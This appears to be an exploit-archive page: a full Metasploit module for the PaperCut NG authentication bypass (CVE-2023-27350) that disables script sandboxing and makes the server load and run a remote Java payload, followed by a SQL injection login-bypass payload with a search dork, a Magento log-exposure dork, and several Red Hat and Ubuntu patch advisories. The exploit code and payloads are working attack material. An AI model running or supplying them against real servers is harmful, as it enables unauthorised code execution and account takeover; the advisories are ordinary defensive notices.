This Metasploit module leverages an authentication bypass in PaperCut NG. If necessary it updates Papercut configuration options, specifically the print-and-de vice.script.enabled and print.script.sandboxed options to allow for arbitrary code execution running in the builtin RhinoJS engine. This module logs at most 2 events in the application log of papercut. Each event is tied to modification of server settings.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'cgi'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  def initialize(info = {})    super(      update_info(        info,        'Name' => 'PaperCut PaperCutNG Authentication Bypass',        'Description' => %q{          This module leverages an authentication bypass in PaperCut NG. If necessary it          updates Papercut configuration options, specifically the 'print-and-device.script.enabled'          and 'print.script.sandboxed' options to allow for arbitrary code execution running in          the builtin RhinoJS engine.          This module logs at most 2 events in the application log of papercut. Each event is tied          to modifcation of server settings.        },        'License' => MSF_LICENSE,        'Author' => ['catatonicprime'],        'References' => [          ['CVE', '2023-27350'],          ['ZDI', '23-233'],          ['URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219'],          ['URL', 'https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/'],          ['URL', 'https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/'],          ['URL', 'https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software']        ],        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [ [ 'Automatic Target', {}] ],        'Platform' => [ 'java' ],        'Arch' => ARCH_JAVA,        'Privileged' => true,        'DisclosureDate' => '2023-03-13',        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => '9191',          'SSL' => 'false'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'Path to the papercut application', '/app']),        OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])      ], self.class    )    @csrf_token = nil    @config_cleanup = []  end  def bypass_auth    # Attempt to generate a session & recover the anti-csrf token for future requests.    res = send_request_cgi(      {        'method' => 'GET',        'uri' => normalize_uri(target_uri.path),        'keep_cookies' => true,        'vars_get' => {          'service' => 'page/SetupCompleted'        }      }    )    return nil unless res && res.code == 200    vprint_good("Bypass successful and created session: #{cookie_jar.cookies[0]}")    # Parse the application version from the response for future decisions.    product_details = res.get_html_document.xpath('//div[contains(@class, "product-details")]//span').children[1]    if product_details.nil?      product_details = res.get_html_document.xpath('//span[contains(@class, "version")]')    end    version_match = product_details.text.match('(?<major>[0-9]+)\.(?<minor>[0-9]+)')    @version_major = Integer(version_match[:major])    match = res.get_html_document.xpath('//script[contains(text(),"csrfToken")]').text.match(/var csrfToken ?= ?'(?<csrf>[^']*)'/)    @csrf_token = match ? match[:csrf] : ''  end  def get_config_option(name)    # 1) do a quickfind (setting the tapestry state)    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path),        'keep_cookies' => true,        'headers' => {          'Origin' => full_uri        },        'vars_post' => {          'service' => 'direct/1/ConfigEditor/quickFindForm',          'sp' => 'S0',          'Form0' => '$TextField,doQuickFind,clear',          '$TextField' => name,          'doQuickFind' => 'Go'        }      }    )    # 2) parse and return the result    return nil unless res && res.code == 200 && (html = res.get_html_document)    return nil unless (td = html.xpath("//td[@class='propertyNameColumnValue']"))    return nil unless td.count == 1 && td.text == name    value_input = html.xpath("//input[@name='$TextField$0']")    value_input[0]['value']  end  def set_config_option(name, value, rollback)    # set name:value pair(s)    current_value = get_config_option(name)    if current_value == value      vprint_good("Server option '#{name}' already set to '#{value}')")      return    end    vprint_status("Setting server option '#{name}' to '#{value}') was '#{current_value}'")    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path),        'keep_cookies' => true,        'headers' => {          'Origin' => full_uri        },        'vars_post' => {          'service' => 'direct/1/ConfigEditor/$Form',          'sp' => 'S1',          'Form1' => '$TextField$0,$Submit,$Submit$0',          '$TextField$0' => value,          '$Submit' => 'Update'        }      }    )    fail_with Failure::NotVulnerable, "Could not update server config option '#{name}' to value of '#{value}'" unless res && res.code == 200    # skip storing the cleanup change if this is rolling back a previous change    @config_cleanup.push([name, current_value]) unless rollback  end  def cleanup    super    if @config_cleanup.nil?      return    end    until @config_cleanup.empty?      cfg = @config_cleanup.pop      vprint_status("Rolling back '#{cfg[0]}' to '#{cfg[1]}'")      set_config_option(cfg[0], cfg[1], true)    end  end  def primer    payload_uri = get_uri    script = <<~SCRIPT      var urls = [new java.net.URL("#{payload_uri}.jar")];      var cl = new java.net.URLClassLoader(urls).loadClass('metasploit.Payload').newInstance().main([]);      s;    SCRIPT    # The number of parameters passed changed in version 17.    form0 = 'printerId,enablePrintScript,scriptBody,$Submit,$Submit$0'    if @version_major > 16      form0 += ',$Submit$1'    end    # 6) Trigger the code execution the printer_id    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path),        'keep_cookies' => true,        'headers' => {          'Origin' => full_uri        },        'vars_post' => {          'service' => 'direct/1/PrinterDetails/$PrinterDetailsScript.$Form',          'sp' => 'S0',          'Form0' => form0,          'enablePrintScript' => 'on',          '$Submit$1' => 'Apply',          'printerId' => 'l1001',          'scriptBody' => script        }      }    )    fail_with Failure::NotVulnerable, 'Failed to prime payload.' unless res && res.code == 200  end  def check    # For the check command    bypass_success = bypass_auth    if bypass_success.nil?      return Exploit::CheckCode::Safe    end    return Exploit::CheckCode::Vulnerable  end  def exploit    # Main function    # 1) Bypass the auth using the SetupCompleted page & store the csrf_token for future requests.    bypass_auth unless @csrf_token    if @csrf_token.nil?      fail_with Failure::NotVulnerable, 'Target is not vulnerable'    end    # Sandboxing wasn't introduced until version 19    if @version_major >= 19      # 2) Enable scripts, if needed      set_config_option('print-and-device.script.enabled', 'Y', false)      # 3) Disable sandboxing, if needed      set_config_option('print.script.sandboxed', 'N', false)    end    # 5) Select the printer, this loads it into the tapestry session to be modified    res = send_request_cgi(      {        'method' => 'GET',        'uri' => normalize_uri(target_uri.path),        'keep_cookies' => true,        'headers' => {          'Origin' => full_uri        },        'vars_get' => {          'service' => 'direct/1/PrinterList/selectPrinter',          'sp' => 'l1001'        }      }    )    fail_with Failure::NotVulnerable, 'Unable to select [Template Printer]' unless res && res.code == 200    Timeout.timeout(datastore['HTTPDELAY']) { super }  rescue Timeout::Error    # When the server stop due to our timeout, this is raised  end  def on_request_uri(cli, request)    vprint_status("Sending payload for requested uri: #{request.uri}")    send_response(cli, payload.raw)  endend

PaperCut PaperCutNG Authentication Bypass

Red Hat Security Advisory 2023-3366-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.2. Issues addressed include a traversal vulnerability.

Red Hat Security Advisory 2023-3366-01

Whitepaper called Bughunter's Life-Style: A DIY guide to become an alone long time bughunter for ordinary people. Written in Spanish.

A DIY Guide To Become An Alone Long Time Bughunter For Ordinary People

Ubuntu Security Notice 6028-2 - USN-6028-1 fixed vulnerabilities in libxml2. This update provides the corresponding updates for Ubuntu 23.04. It was discovered that libxml2 incorrectly handled certain XML files. An attacker could possibly use this issue to cause a crash.

==========================================================================  
Ubuntu Security Notice USN-6028-2  
June 07, 2023

libxml2 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04

Summary:

Several security issues were fixed in libxml2.

Software Description:  
- libxml2: GNOME XML library

Details:

USN-6028-1 fixed vulnerabilities in libxml2. This update provides the  
corresponding updates for Ubuntu 23.04.

Original advisory details:

 It was discovered that libxml2 incorrectly handled certain XML files.  
 An attacker could possibly use this issue to cause a crash.  
 (CVE-2022-2309)

 It was discovered that lixml2 incorrectly handled certain XML files.  
 An attacker could possibly use this issue to cause a crash or execute  
 arbitrary code. (CVE-2023-28484)

 It was discovered that libxml2 incorrectly handled certain XML files.  
 An attacker could possibly use this issue to cause a crash.  
 (CVE-2023-29469)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libxml2                         2.9.14+dfsg-1.1ubuntu0.1  
  libxml2-utils                   2.9.14+dfsg-1.1ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6028-2  
  https://ubuntu.com/security/notices/USN-6028-1  
  CVE-2022-2309, CVE-2023-28484, CVE-2023-29469

Package Information:  
  https://launchpad.net/ubuntu/+source/libxml2/2.9.14+dfsg-1.1ubuntu0.1

Ubuntu Security Notice USN-6028-2

Red Hat Security Advisory 2023-3491-01 - An update for redhat-release-virtualization-host and redhat-virtualization-host is now available for Red Hat Virtualization 4 for Red Hat Enterprise Linux 8. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Virtualization Host 4.4.z SP 1 security update  
Advisory ID:       RHSA-2023:3491-01  
Product:           Red Hat Virtualization  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3491  
Issue date:        2023-06-06  
CVE Names:         CVE-2022-3564 CVE-2022-4378 CVE-2022-38023   
                   CVE-2022-41222 CVE-2023-0461 CVE-2023-1668   
=====================================================================

1. Summary:

An update for redhat-release-virtualization-host and  
redhat-virtualization-host is now available for Red Hat Virtualization 4  
for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

RHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64  
Red Hat Virtualization 4 Hypervisor for RHEL 8 - x86_64

3. Description:

Security Fix(es):

* kernel: use-after-free caused by l2cap_reassemble_sdu() in  
net/bluetooth/l2cap_core.c (CVE-2022-3564)

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

* samba: RC4/HMAC-MD5 NetLogon Secure Channel is weak and should be avoided  
(CVE-2022-38023)

* kernel: mm/mremap.c use-after-free vulnerability (CVE-2022-41222)

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

* openvswitch: ip proto 0 triggers incorrect handling (CVE-2023-1668)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/2974891

5. Bugs fixed (https://bugzilla.redhat.com/):

2137666 - CVE-2023-1668 openvswitch: ip proto 0 triggers incorrect handling  
2138818 - CVE-2022-41222 kernel: mm/mremap.c use-after-free vulnerability  
2150999 - CVE-2022-3564 kernel: use-after-free caused by l2cap_reassemble_sdu() in net/bluetooth/l2cap_core.c  
2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
2154362 - CVE-2022-38023 samba: RC4/HMAC-MD5 NetLogon Secure Channel is weak and should be avoided  
2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets

6. Package List:

Red Hat Virtualization 4 Hypervisor for RHEL 8:

Source:  
redhat-virtualization-host-4.5.3-202306050942_8.6.src.rpm

x86_64:  
redhat-virtualization-host-image-update-4.5.3-202306050942_8.6.x86_64.rpm

RHEL 8-based RHEV-H for RHEV 4 (build requirements):

Source:  
redhat-release-virtualization-host-4.5.3-7.el8ev.src.rpm

noarch:  
redhat-virtualization-host-image-update-placeholder-4.5.3-7.el8ev.noarch.rpm

x86_64:  
redhat-release-virtualization-host-4.5.3-7.el8ev.x86_64.rpm  
redhat-release-virtualization-host-content-4.5.3-7.el8ev.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2022-38023  
https://access.redhat.com/security/cve/CVE-2022-41222  
https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/cve/CVE-2023-1668  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH90HtzjgjWX9erEAQighRAAiuq1CTwA4mbQuYcrigA9YiXuroKJrwMs  
YjzKehyc2I0li5xnc/PxStywzrjx7lUH1S9ugjxpkmjeQWDwt824zmEodDe0wHNQ  
ip0KjW8mQgs0drEUYythXKDhJrxQr3pjTh7a/pdOwlxsbIuaVhTmeUN7p1UGl22L  
hroyQTVVpi8mqo/o10H22Sxx2mNSCQrExn/7ec3BaRTu7LaUIUo9fTtBhNP5GEFx  
CjHJUNd79vhY9HdlSVLIwMNJAo+WEoMR1CV+2m82wgVzCopWXsDIoyehYKu936eJ  
L0MFokGxPLloG1bkHnbwAenR1d+fy3LEfCWfyNDcbNOGNuCQvF9jv4ZNmZYOwdkj  
6NVwOeMe546QhJL16gyIcKCxfhk56eNmTp+KxoSUW54RM+m+8VOSRn3josmi3NyA  
ZRihHAWSEj/fT+q1p7aqdHUF3woINb/mQQmvo1DY+v62wVqkigxbqoMPAgwHmoX/  
2AiSYQKEY1WGEpZNhHjR3gUL5GNPodXcwTICCH2V6DAgf2FK0OuSI9Q9njVN7IJM  
gOfbzceURZt1Id9hvkEg8+lIhVTB6NZSgyMwM02e1P5tg30ifjQAI1Bo6DDXtv2f  
c6m11ArXHbQXMNnx6Q+gqr2UJFHCIHi7Ce6m4oD1Cl4zM9PLcGpHS9xx3qoLo0h9  
09Z84nCl5w4=  
=zOgN  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3491-01

Magento eCommerce version 2.4.0 suffers from an information disclosure vulnerability.

    ====================================================================================================================================| # Title     : Magento eCommerce v 2.4.0 sensitive information disclosure Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              | | # Vendor    : https://devdocs.magento.com/                                                                                       |  | # Dork      : Index of /var/log/                                                                                                 |====================================================================================================================================poc : [+]  Keeping records in an unprotected folder, The logs contain sensitive information such as folder path,etc...[+]  Dorking İn Google Or Other Search Enggine .[+]  http://127.0.0.1/dawnfrozenfoods.com/var/log/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Magento eCommerce 2.4.0 Information Disclosure

Wizcyb Interactive version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : wizcyb interactive v2.0 auth by pass Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.wizcyb.com/products.php                                                                                |  | # Dork      : powered by wizcyb interactive                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=1' or 1=1 -- - & pass=1' or 1=1 -- - [+] https://127.0.0.1/www/jobcapsindiacom/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Wizcyb Interactive 2.0 SQL Injection

Red Hat Security Advisory 2023-3490-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:3490-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3490  
Issue date:        2023-06-06  
CVE Names:         CVE-2023-0461 CVE-2023-2008 CVE-2023-32233   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.9.0) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

* kernel: udmabuf: improper validation of array index leading to local  
privilege escalation (CVE-2023-2008)

* kernel: netfilter: use-after-free in nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets  
2186862 - CVE-2023-2008 kernel: udmabuf: improper validation of array index leading to local privilege escalation  
2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
kpatch-patch-5_14_0-70_30_1-1-6.el9_0.src.rpm  
kpatch-patch-5_14_0-70_36_1-1-5.el9_0.src.rpm  
kpatch-patch-5_14_0-70_43_1-1-4.el9_0.src.rpm  
kpatch-patch-5_14_0-70_49_1-1-3.el9_0.src.rpm  
kpatch-patch-5_14_0-70_50_2-1-2.el9_0.src.rpm  
kpatch-patch-5_14_0-70_53_1-1-1.el9_0.src.rpm

ppc64le:  
kpatch-patch-5_14_0-70_30_1-1-6.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_30_1-debuginfo-1-6.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_30_1-debugsource-1-6.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_36_1-1-5.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_36_1-debuginfo-1-5.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_36_1-debugsource-1-5.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_43_1-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_43_1-debuginfo-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_43_1-debugsource-1-4.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_49_1-1-3.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_49_1-debuginfo-1-3.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_49_1-debugsource-1-3.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_50_2-1-2.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_50_2-debuginfo-1-2.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_50_2-debugsource-1-2.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_53_1-1-1.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_53_1-debuginfo-1-1.el9_0.ppc64le.rpm  
kpatch-patch-5_14_0-70_53_1-debugsource-1-1.el9_0.ppc64le.rpm

x86_64:  
kpatch-patch-5_14_0-70_30_1-1-6.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_30_1-debuginfo-1-6.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_30_1-debugsource-1-6.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_36_1-1-5.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_36_1-debuginfo-1-5.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_36_1-debugsource-1-5.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_43_1-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_43_1-debuginfo-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_43_1-debugsource-1-4.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_49_1-1-3.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_49_1-debuginfo-1-3.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_49_1-debugsource-1-3.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_50_2-1-2.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_50_2-debuginfo-1-2.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_50_2-debugsource-1-2.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_53_1-1-1.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_53_1-debuginfo-1-1.el9_0.x86_64.rpm  
kpatch-patch-5_14_0-70_53_1-debugsource-1-1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/cve/CVE-2023-2008  
https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH90BdzjgjWX9erEAQgjZg/8DxqCbesJneHmcvrIpd6OD0CdufF6Ieyv  
Mg+SVpUVFZXaaj89PAoQdSCSt9cpUNvVGOdXX/yAkkOnArdq2NvyabMyq790kcWa  
N/5k7g/Tj/uV5maR5jlONZ54uk72RKnIzllgAlJlySX3Hm41dRCrrPKO16c3ev7B  
LPlQi33dvMVDGXHpNQDQlfY5zIItjQgok4csQSnOR4fKoDKwqzzXrSJwoWXZZp//  
WFJWCEPDg3qLTWqbC7bF5FTk1KG9i6YjTW+G8z3KKE9SYzxH2HBT00fnNKvE+mTg  
2LEQ4w4tGrcP6t7gQMKdqUtwXNTCr2dqiAk0Ep3HtTfNhwSctlgZuJLTtYgI8SEM  
qIpXmYXScF0sSLIsA7jGoGplIcWKAnHCFS6MmbDtNYltD7+Usv7fXxc0hItYSAx2  
vncQdq0RWG5mE46iH6cRO4VzW1G6U/+qxsebyhnj/mZ4pjMmTcmDoosqtwYWTDF5  
HFS5yy+km6Czlwo+gYZRnVtwTa4JEYLFtukt+6xUvqIniRYHEeg/UHa69wHfsfAF  
nNGswPL4VzA2swfnzEwEnlkVx6bLaLOCVlQsWxBsVQR97jY7DVL0IH+abGFVIsga  
VYMPJmSJDNfGijkm6OI4eIZXyDOMkLcf+O9+N+HOo/E7DKNtwf3pFrQGew2/TSiS  
8BrtfTkVQmI=  
=tuxU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3490-01

Red Hat Security Advisory 2023-3517-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:3517-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3517  
Issue date:        2023-06-06  
CVE Names:         CVE-2022-42896   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v.8.4) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in  
net/bluetooth/l2cap_core.c (CVE-2022-42896)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2147364 - CVE-2022-42896 kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v.8.4):

Source:  
kpatch-patch-4_18_0-305_71_1-1-5.el8_4.src.rpm  
kpatch-patch-4_18_0-305_72_1-1-4.el8_4.src.rpm  
kpatch-patch-4_18_0-305_76_1-1-3.el8_4.src.rpm  
kpatch-patch-4_18_0-305_82_1-1-2.el8_4.src.rpm  
kpatch-patch-4_18_0-305_86_2-1-1.el8_4.src.rpm  
kpatch-patch-4_18_0-305_88_1-1-1.el8_4.src.rpm

ppc64le:  
kpatch-patch-4_18_0-305_71_1-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-debuginfo-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-debugsource-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-debuginfo-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-debugsource-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-debuginfo-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-debugsource-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_86_2-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_86_2-debuginfo-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_86_2-debugsource-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_88_1-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_88_1-debuginfo-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_88_1-debugsource-1-1.el8_4.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-305_71_1-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-debuginfo-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-debugsource-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-debuginfo-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-debugsource-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-debuginfo-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-debugsource-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_86_2-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_86_2-debuginfo-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_86_2-debugsource-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_88_1-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_88_1-debuginfo-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_88_1-debugsource-1-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42896  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH90AdzjgjWX9erEAQjahQ/+Mq7WTw3u1UL+Wh0AJgWz7hb5T7WDbj6S  
msRTXxsRQ8qrQpr7JgLAt25uGC9cRydd/oNPbnsIAQi5toLq5c9LEcOreBMalyep  
JYyHdXpeLmILPpdFyHnRBQ4QAwhi+rwSnmtk6I4wxQtCY/DQu1AFcJXzJe7aXBiN  
elR4I4iFzXR0lh5Bh5z3f94eJidP64A/TM/c/pYKvYIYwIAhDNNl/tsQoANvfKUR  
